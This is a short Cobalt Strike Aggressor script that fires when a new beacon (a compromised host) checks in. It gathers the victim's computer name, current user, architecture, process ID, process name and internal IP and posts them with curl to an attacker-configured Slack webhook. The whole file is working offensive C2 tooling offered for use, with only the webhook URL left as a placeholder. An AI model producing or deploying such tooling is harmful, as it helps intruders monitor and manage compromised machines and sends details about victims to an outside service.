# Author : Frey
# Description : Slack WebHook Notifier for Cobalt Strike Agents
# Written purely because there's no actual Notifier without being based on a side python script


# Slack Base Environmental Variables

$SlackWebHook = '<WEB HOOK HERE>';    
$SlackChannel = "#general";
$SlackIcon = 'https://blog.parrot-pentest.com/wp-content/uploads/2022/07/cobalt.png';

on beacon_initial {
        $teamserver_hostname = "127.0.0.1 Team Server";
        $computer = beacon_info($1, "computer");
        $arch = beacon_info($1, "arch");
        $pid = beacon_info($1, "pid");
        $process = beacon_info($1, "process");
        $internal = beacon_info($1, "internal");
        $user = beacon_info($1, "user");
        $beacon_text = '{"username": "Cobalt Strike Agent Notifier", "icon_url": "' . $SlackIcon. '", "channel": "' . $SlackChannel . '", "text":"New Beacon on *' . $teamserver_hostname . '*\\nComputer Name : *' . $computer . '*\\nCurrent User : *' . $user . '*\\nArchitecture : *' . $arch . '*\\nProcess ID : *' . $pid . '*\\nCurrent Process : *' . $process . '*\\nInternal IP : *' . $internal . '*"}';
	@curl_command = @('curl','-X','POST','--data-urlencode', 'payload=' . $beacon_text. '', $SlackWebHook);
	exec(@curl_command);
}

